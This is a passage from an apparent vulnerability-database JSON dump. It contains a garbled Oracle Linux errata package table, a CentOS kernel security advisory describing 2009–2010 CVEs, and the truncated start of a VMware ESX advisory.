> t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 x e n - 1 . 4 . 4 - 1 . e l 5 . i a 6 4 . r p m / t d > t d > 7 5 9 a d 9 b 0 6 c 5 7 c c 5 1 e 2 a 2 0 6 8 a 8 8 b 7 4 f 9 5 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 2 . 0 . 5 - 1 . e l 5 . i a 6 4 . r p m / t d > t d > d 5 c 1 e a 4 3 7 0 4 c 5 8 3 b 2 5 3 b 7 7 4 7 e f 4 d 5 6 5 f / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 d e b u g - 2 . 0 . 5 - 1 . e l 5 . i a 6 4 . r p m / t d > t d > d 4 d 6 a 1 4 6 8 0 e a 6 6 0 7 3 7 0 9 1 c 6 b 5 f b 8 8 5 6 f / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 x e n - 2 . 0 . 5 - 1 . e l 5 . i a 6 4 . r p m / t d > t d > d c f 9 f d 3 2 9 f 3 e c 1 7 f d 0 e a 9 a 2 b e 9 a 0 9 c 0 1 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 5 ( x 8 6 _ 6 4 ) / t d > t d > k e r n e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . s r c . r p m / t d > t d > 7 7 2 7 3 2 e d 5 1 f 2 6 1 7 c 2 a 4 c 5 8 3 6 2 7 3 a b 0 b 7 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 1 . 4 . 4 - 1 . e l 5 . s r c . r p m / t d > t d > b b e 4 6 2 b 8 2 c 7 c a 3 0 1 2 0 6 6 8 e 0 c f d 9 8 c a 5 6 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 2 . 0 . 5 - 1 . e l 5 . s r c . r p m / t d > t d > 9 8 6 5 6 f d 8 2 3 2 2 a 6 0 9 9 1 b 6 a 8 c e 9 6 d 3 9 0 8 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 2 d f f b 9 d f 2 9 2 d e b b c 5 4 2 b 5 5 4 b d 7 5 d 7 5 6 0 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e b u g - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 7 0 9 f 9 7 e 5 b 6 a c 4 1 3 1 d 8 2 9 7 e c a 9 c 9 a 1 7 e 8 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e b u g - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > c 0 e 7 4 d 9 f 8 a 2 0 8 0 0 6 1 3 b 8 f 8 c 2 5 a e 3 7 a a 2 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 1 7 0 b b 7 3 5 d 9 5 d f 4 4 7 d 7 4 5 d f 2 6 4 1 8 0 9 3 7 b / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d o c - 2 . 6 . 1 8 - 1 9 4 . e l 5 . n o a r c h . r p m / t d > t d > 5 d 0 7 0 f 1 d d 6 b 2 a e 2 2 6 0 9 9 b 0 f 8 f 0 a c e 3 9 2 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - h e a d e r s - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 6 5 2 2 4 0 5 a c 1 9 f 3 8 8 8 e 8 8 b 7 c 3 f f 8 5 9 0 0 4 b / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - x e n - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > d a 0 5 8 2 1 4 5 0 9 0 e 7 0 f a 9 1 f 9 8 2 3 3 a 1 6 f 7 0 f / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - x e n - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 1 a f 5 6 e d 4 9 1 a 0 6 6 e f b f 7 4 2 b 5 6 c c 3 b 0 8 2 9 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 1 . 4 . 4 - 1 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 7 6 8 1 4 9 5 1 5 3 c c 3 e f 9 1 d b 0 7 e 8 4 5 4 5 4 a 6 f 8 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 d e b u g - 1 . 4 . 4 - 1 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 2 b 6 a d f f b 3 2 5 5 3 1 0 0 9 c d 8 9 8 8 a 6 7 c 2 7 8 b 0 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 x e n - 1 . 4 . 4 - 1 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > f 2 9 7 e 8 5 6 e 8 5 f 6 e a d 4 d 0 7 5 0 4 2 2 9 f 6 8 8 6 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 2 . 0 . 5 - 1 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 4 0 0 d 5 8 8 6 a d 1 5 f 5 4 e 6 0 b 3 1 8 b b 9 7 8 b 2 b 1 a / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 d e b u g - 2 . 0 . 5 - 1 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 1 9 b 4 f 8 9 0 f 5 9 a 3 c 5 4 8 1 8 2 a 3 5 3 7 4 b 5 7 5 4 c / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 x e n - 2 . 0 . 5 - 1 . e l 5 . x 8 6 _ 6 4 . r p m / t d > t d > 8 9 e 0 c 8 7 0 e 7 7 6 d 7 5 9 4 0 9 0 1 e e 9 e 0 3 9 1 2 7 1 / t d > t d > a h r e f = # > - / a > / t d > / t r > \n / t b o d y > / t a b l e > \n \n \n b r > b r > \n b r > p > \n T h i s p a g e i s g e n e r a t e d a u t o m a t i c a l l y a n d h a s n o t b e e n c h e c k e d f o r e r r o r s o r o m i s s i o n s . F o r c l a r i f i c a t i o n \n o r c o r r e c t i o n s p l e a s e c o n t a c t t h e a h r e f = \" h t t p s : / / l i n u x . o r a c l e . c o m / \" > O r a c l e L i n u x U L N t e a m / a > / p > \n \n \n \n / d i v > \n ! - - \n / d i v > \n - - > \n / d i v > \n / d i v > \n \n \n d i v i d = \" m c 1 6 \" c l a s s = \" m c 1 6 v 0 \" > \n d i v c l a s s = \" m c 1 6 w 1 \" > \n h 2 > T e c h n i c a l i n f o r m a t i o n / h 2 > \n u l > \n l i > a h r e f = \" h t t p s : / / l i n u x . o r a c l e . c o m / h a r d w a r e - c e r t i f i c a t i o n s \" t a r g e t = \" _ b l a n k \" > O r a c l e L i n u x C e r t i f i e d H a r d w a r e / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / l i b r a r y / e l s p - l i f e t i m e - 0 6 9 3 3 8 . p d f \" > O r a c l e L i n u x S u p p o r t e d R e l e a s e s / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 1 \" > \n h 2 > O r a c l e L i n u x S u p p o r t / h 2 > \n u l > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / t e c h n o l o g i e s / l i n u x / O r a c l e L i n u x S u p p o r t / i n d e x . h t m l \" t a r g e t = \" _ b l a n k \" > O r a c l e L i n u x S u p p o r t / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / p r e m i e r / s e r v e r s - s t o r a g e / o v e r v i e w / i n d e x . h t m l \" t a r g e t = \" _ b l a n k \" > O r a c l e P r e m i e r S u p p o r t f o r S y s t e m s / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / a d v a n c e d - c u s t o m e r - s e r v i c e s / o v e r v i e w / \" > A d v a n c e d C u s t o m e r S e r v i c e s / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 2 \" > \n h 2 > C o n n e c t / h 2 > \n u l > \n l i c l a s s = \" f b i c o n \" > a h r e f = \" h t t p : / / w w w . f a c e b o o k . c o m / o r a c l e l i n u x \" t i t l e = \" F a c e b o o k \" n a m e = \" F a c e b o o k \" t a r g e t = \" _ b l a n k \" i d = \" F a c e b o o k \" > F a c e b o o k / a > / l i > \n l i c l a s s = \" t w i c o n \" > a h r e f = \" h t t p : / / w w w . t w i t t e r . c o m / O r a c l e L i n u x \" t i t l e = \" T w i t t e r \" n a m e = \" T w i t t e r \" t a r g e t = \" _ b l a n k \" i d = \" T w i t t e r \" > T w i t t e r / a > / l i > \n l i c l a s s = \" i n i c o n \" > a h r e f = \" h t t p : / / w w w . l i n k e d i n . c o m / g r o u p s ? g i d = 1 2 0 2 3 8 \" t i t l e = \" L i n k e d I n \" n a m e = \" L i n k e d I n \" t a r g e t = \" _ b l a n k \" i d = \" L i n k e d I n \" > L i n k e d I n / a > / l i > \n l i c l a s s = \" y t i c o n \" > a h r e f = \" h t t p : / / w w w . y o u t u b e . c o m / o r a c l e l i n u x c h a n n e l \" t i t l e = \" Y o u T u b e \" n a m e = \" Y o u T u b e \" t a r g e t = \" _ b l a n k \" i d = \" Y o u T u b e \" > Y o u T u b e / a > / l i > \n l i c l a s s = \" b l o g i c o n \" > a h r e f = \" h t t p : / / b l o g s . o r a c l e . c o m / l i n u x \" t i t l e = \" B l o g \" n a m e = \" B l o g \" > B l o g / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 3 \" > \n h 2 > C o n t a c t U s / h 2 > \n u l > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / c o r p o r a t e / c o n t a c t / g l o b a l - 0 7 0 5 1 1 . h t m l \" > G l o b a l c o n t a c t s / a > / l i > \n l i > O r a c l e 1 - 8 0 0 - 6 3 3 - 0 6 9 1 / l i > \n / u l > \n / d i v > \n / d i v > \n / d i v > \n \n d i v i d = \" m c 0 4 \" c l a s s = \" m c 0 4 v 1 \" > \n d i v c l a s s = \" m c 0 4 w 1 \" > \n a h r e f = \" h t t p : / / o r a c l e . c o m \" > i m g s r c = \" / / w w w . o r a c l e i m g . c o m / a s s e t s / m c 0 4 - f o o t e r - l o g o . p n g \" b o r d e r = \" 0 \" a l t = \" s o f t w a r e . h a r d w a r e . c o m p l e t e \" / > / a > \n / d i v > \n \n d i v c l a s s = \" m c 0 4 w 2 \" > \n a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / s u b s c r i b e / i n d e x . h t m l \" > S u b s c r i b e / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / c o r p o r a t e / e m p l o y m e n t / i n d e x . h t m l \" > C a r e e r s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / c o r p o r a t e / c o n t a c t / i n d e x . h t m l \" > C o n t a c t U s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / c o p y r i g h t . h t m l \" > L e g a l N o t i c e s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / t e r m s . h t m l \" > T e r m s o f U s e / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / p r i v a c y . h t m l \" > Y o u r P r i v a c y R i g h t s / a > \n / d i v > \n / d i v > \n / d i v > \n / b o d y > \n / h t m l > \n ", "edition": 4, "reporter": "Oracle", "published": "2010-04-05T00:00:00", "title": "Oracle Enterprise Linux 5.5 kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3556", "CVE-2009-4537", "CVE-2010-0008", "CVE-2009-3939", "CVE-2010-0007", "CVE-2009-4272", "CVE-2009-3621", "CVE-2009-3726", "CVE-2010-0727", "CVE-2009-4141", "CVE-2009-3001", "CVE-2007-4567", "CVE-2009-4027", "CVE-2010-0415", "CVE-2009-3080", "CVE-2009-4538", "CVE-2009-3547", "CVE-2009-4020", "CVE-2009-3620", "CVE-2009-3002", "CVE-2009-4536", "CVE-2010-1188", "CVE-2009-4036", "CVE-2009-4131", "CVE-2009-2908", "CVE-2009-4307", "CVE-2009-3889", "CVE-2009-4021", "CVE-2010-0003", "CVE-2009-3286", "CVE-2009-4138", "CVE-2009-2695", "CVE-2009-2849"], "modified": "2010-04-05T00:00:00", "id": "ELSA-2010-0178", "href": "http://linux.oracle.com/errata/ELSA-2010-0178.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:18", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0046.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-xen-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-xen-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-xen", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-debug-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-xen-devel-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-doc-2.6.18-164.11.1.el5.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-doc-2.6.18-164.11.1.el5.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-PAE-devel-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-xen-devel-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-debug-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-debug", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-headers-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-devel-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-2.6.18-164.11.1.el5.src.rpm", "packageName": "kernel", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-2.6.18-164.11.1.el5.src.rpm", "packageName": "kernel", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-PAE-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-PAE", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-headers-2.6.18-164.11.1.el5.i386.rpm", "packageName": "kernel-headers", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-devel-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-debug-devel-2.6.18-164.11.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "packageFilename": "kernel-debug-devel-2.6.18-164.11.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "arch": "i686", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0046\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* an array index error was found in the gdth driver. A local user could\nsend a specially-crafted IOCTL request that would cause a denial of service\nor, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer, possibly\nleading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to leverage a\nuse-after-free of locked, asynchronous file descriptors to cause a denial\nof service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an attacker\nwas able to cause a large enough number of collisions in the routing hash\ntable (via specially-crafted packets) for the emergency route flush to\ntrigger, a deadlock could occur. Secondly, if the kernel routing cache was\ndisabled, an uninitialized pointer would be left behind after a route\nlookup, leading to a kernel panic. (CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing, could\nuse this flaw to append data to the dumped core file. This issue only\naffects systems that have \"/proc/sys/fs/suid_dumpable\" set to 2 (the\ndefault value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\nset to 2, the core file will not be recorded if the file already exists.\nFor example, core files will not be overwritten on subsequent crashes of\nprocesses whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo files,\n\"/sys/class/scsi_host/[a qla2xxx host]/vport_create\" and \"vport_delete\".\nThese two files were world-writable by default, allowing a local user to\nchange SCSI host attributes. This flaw only affects systems using the\nqla2xxx driver and NPIV capable hardware. (CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The \"dbg_lvl\"\nand \"poll_mode_io\" files on the sysfs file system (\"/sys/\") had\nworld-writable permissions. This could allow local, unprivileged users to\nchange the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver\nused for OHCI compliant IEEE 1394 controllers. A local, unprivileged user\nwith access to /dev/fw* files could issue certain IOCTL calls, causing a\ndenial of service or privilege escalation. The FireWire modules are\nblacklisted by default, and if enabled, only root has access to the files\nnoted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS file system implementation. This could lead to a denial of service if a\nuser browsed a specially-crafted HFS file system, for example, by running\n\"ls\". (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update/\nindex.html\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016480.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\n", "edition": 1, "reporter": "CentOS Project", "published": "2010-01-20T18:10:39", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "kernel security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2010-01-20T18:10:40", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html", "id": "CESA-2010:0046", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2018-09-02T02:40:37", "references": [], "affectedPackage": [{"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201005408-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX350-201006405-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi400-201005401-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "2.5.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "eq"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX350-201006408-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201005401-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXe350-201006401-I-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "Redhat", "OSVersion": "5", "packageVersion": "4.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vMA", "operator": "eq"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201005405-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201005409-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "3.0.3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "eq"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201005407-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX350-201006406-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201005406-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}], "description": "a. Service Console update for COS kernel \n \nUpdated COS package \"kernel\" addresses the security issues that are fixed through versions 2.6.18-164.11.1. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1 \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1 \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 3, "reporter": "VMware", "published": "2010-05-27T00:00:00", "title": "ESXi utilities and ESX Service Console third party updates", "type": "vmware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3613", "CVE-2009-3556", "CVE-2009-1386", "CVE-2009-4537", "CVE-2009-1379", "CVE-2009-3939", "CVE-2009-1377", "CVE-2009-4272", "CVE-2009-3621", "CVE-2009-3726", "CVE-2009-2910", "CVE-2009-4355", "CVE-2009-4141", "CVE-2009-2409", "CVE-2009-3563", "CVE-2009-1387", "CVE-2010-0001", "CVE-2007-4567", "CVE-2010-0382", "CVE-2009-1378", "CVE-2010-0290", "CVE-2009-0590", "CVE-2009-3080", "CVE-2009-4538", "CVE-2009-3547", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3620", "CVE-2010-0426", "CVE-2009-4536", "CVE-2010-0427", "CVE-2009-2908", "CVE-2009-1384", "CVE-2009-3228", "CVE-2009-3889", "CVE-2010-0097", "CVE-2009-4212", "CVE-2009-4021", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-3736", "CVE-2009-4138", "CVE-2009-2695"], "modified": "2010-06-24T00:00:00", "id": "VMSA-2010-0009", "href": "https://www.vmware.com/security/advisories/VMSA-2010-0009.html", "cvss": 